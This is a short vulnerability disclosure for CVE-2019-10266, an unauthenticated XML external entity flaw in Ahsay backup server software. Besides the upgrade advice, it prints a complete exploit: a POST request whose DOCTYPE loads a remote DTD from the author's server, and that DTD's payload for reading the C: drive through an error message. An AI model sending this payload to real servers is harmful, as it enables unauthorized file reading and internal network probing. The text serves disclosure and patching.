CVE-2019-10266 - unauthenticated XML External Entity (XXE)
Upgrade to the latest version of Ahsay, currently 18.104.22.168 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)
By sending an XXE through the following POST request, the server will trigger an error that will show the content of a file or a directory:
POST /obs/obm8/user/setUserProfile HTTP/1.1 Content-Type: application/octet-stream Content-Length: 126 Host: 172.16.238.213:80 <?xml version="1.0"?> <!DOCTYPE root [<!ENTITY % remote SYSTEM "https://www.wbsec.nl/ahsay/oob.dtd"> %remote;%intern; %trick;]>
As you can see it includes the following file
https://www.wbsec.nl/xxe/oob.dtd this file is hosted at my server and contains:
<!ENTITY % payl SYSTEM "file:///c:/"><!ENTITY % intern "<!ENTITY % trick SYSTEM 'file://:%payl;/%payl;'>">
When the POST request is executed by the server, the server will fetch the file and tries to interpret it but it fails. This will then result in an error message showing the content of the directory. With the XXE it is possible to read files, scan internal networks and request internal systems. We do not have to be authenticated to exploit this.